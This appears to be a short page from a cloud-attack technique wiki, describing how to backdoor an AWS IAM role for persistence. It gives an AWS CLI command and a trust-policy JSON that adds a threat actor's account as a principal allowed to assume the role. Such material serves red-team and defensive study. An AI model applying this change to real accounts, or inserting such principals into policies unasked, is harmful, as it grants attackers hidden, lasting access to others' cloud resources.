Backdoor an IAM Role

AWS persistence technique

Overview

AM Roles have Trust Policies which dictate who or what (user/role/service) can assume the Role and gain access to its credentials and permissions. With this permission, a threat actor can modify the role's trust policy and gain access to it.

aws iam update-assume-role-policy --role-name Engineering --policy-document file://attacker-trust-policy.json

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": [
                    "arn:aws:iam::111111111111:user/legitimate-user",
                    "arn:aws:iam::222222222222:user/threat-actor"
                ]
            },
            "Action": "sts:AssumeRole"
        }
    ]
}

PreviousCreating IAM Access Keys NextGenerating Temporary AWS Credentials from IAM User

Last updated 4 days ago

Was this helpful?